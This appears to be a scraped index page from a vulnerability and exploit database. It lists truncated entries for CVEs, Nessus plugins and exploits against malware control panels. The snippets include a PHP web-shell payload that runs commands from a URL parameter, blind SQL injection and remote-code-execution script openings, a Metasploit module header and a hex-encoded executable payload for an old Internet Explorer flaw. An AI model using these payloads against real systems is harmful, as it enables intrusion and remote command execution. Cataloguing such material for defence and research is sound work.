KLA90983 PE vulnerability in Microsoft System Center

An elevation of privilege vulnerability was found in Microsoft System Center. Malicious users can exploit this vulnerability to bypass security restrictions, gain privileges. Original advisories CVE-2026-33825 Exploitation Public exploits exist for this vulnerability. Malware exists for this...

Exploit for Type Confusion in Apple Ipados

🛡️ corunaanalysis - Understand Malware Exploit Behavior Simpl...

EUVD-2007-4229

Malware in sbrugna...

CVE-2022-30772

Manipulation of the input address in PnpSmm function 0x52 could be used by malware to overwrite SMRAM or OS kernel memory. Function 0x52 of the PnpSmm driver is passed the address and size of data to write into the SMBIOS table, but manipulation of the address could be used by malware to overwrit...

CVE-2025-0121

A null pointer dereference vulnerability in the Palo Alto Networks Cortex® XDR agent on Windows devices allows a low-privileged local Windows user to crash the agent. Additionally, malware can use this vulnerability to perform malicious activity without Cortex XDR being able to detect it...

CVE-2025-0112

A problem with a detection mechanism in the Palo Alto Networks Cortex XDR agent on Windows devices enables a user with Windows non-administrative privileges to disable the agent. This vulnerability can also be leveraged by malware to disable the Cortex XDR agent and then perform malicious activit...

PT-2021-4794

Name of the Vulnerable Software and Affected Versions Microsoft Windows Installer versions prior to the fixed version Description The vulnerability is related to an elevation-of-privilege issue in the Windows Installer component, allowing attackers to gain administrative privileges. This issue...

Adobe Flash Player <= 29.0.0.171 (APSB18-19)

The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 29.0.0.171. It is therefore affected by multiple vulnerabilities. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include'compat.inc'; if description...

Malware exploit: Madnesspro

Type: SQLi Vuln: Author: bwall !/usr/bin/env python2 -- coding: utf-8 -- Exploit Title: Madness Pro = 1.14 SQL injection Date: June 05, 2014 Exploit Author: @botnethunter Version: 1.14 Tested on: Apache2 - Ubuntu - MySQL Unauthenticated SQL injection in Madness Pro panel = 1.14 Proof of Concept...

Malware exploit: Zskimmer

Type: SQLi Vuln: http://localhost/process.php?xy=2...

Malware exploit: W3tw0rk

Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...

Malware exploit: Atrax

Type: Shell Upload Vulnerability Author: Xylitol import random import string import base64 import urllib import urllib2 CONFIG payload = 'pre?php ifisset$GET"c"system$GET"c";else echo"No input?";?/pre' url = 'http://localhost/atrax/' /CONFIG BOTMODEINSERT = 'b' BOT MODE BOTMODERUNPLUGIN = 'e'...

Malware exploit: Citadel

Type: Remote Code Execution Author: Xylitol import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method == 'POST': urllib2.urlopenurl, urllib.urlencodeparams.read elif method ==...

Malware exploit: Phase

Type: Blind SQL injection vulnerability Author: Xylitol ?php // Start with PHP CLI php pwn.php settimelimit0; // Adjust this : define'SLEEPTIME', '4'; define'PAGETIME', 4; define'URL', 'http://localhost/Phase/'; echo'attacking ' . URL . PHPEOL; getstring'username'; getstring'password'; function...

SA102 : Unifed Agent Configuration Changes are not Detected

SUMMARY Configuration files for Unified Agent running in local enforcement mode can be modified by administrators on the client. Configuration files can be modified to unblock categories or to disable Unified Agent entirely. AFFECTED PRODUCTS Unified Agent --- CVE | Affected Versions | Remediatio...

MS07-027: Cumulative Security Update for Internet Explorer (931768)

The remote host is missing the IE cumulative security update 931768. The remote version of IE is vulnerable to several flaws that could allow an attacker to execute arbitrary code on the remote host. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc';...

Microsoft IE FRAME/IFRAME/EMBED Tag Overflow (Bofra Worm Detection)

The remote host seems to have been infected with the Bofra worm or one of its variants, which infects machines via an Internet Explorer IFRAME exploit. It is very likely this system has been compromised. Bofra virus detection Author: Brian Smith-Sweeney [email protected]...

Microsoft Internet Explorer - Object Data Remote (MS03-032)

Microsoft Internet Explorer - Object Data Remote MS03-032 by malware M03-032 Exploit self.MoveTo 5000,5000 dim v24 cut="" v0="4D,5A,44,01,05,y,02,y,20,y,21,y,z2,75,y2,02,y2,99,y3,3E,y3,01,y,FB,30,6A,72,y1C,79,y3,9E,...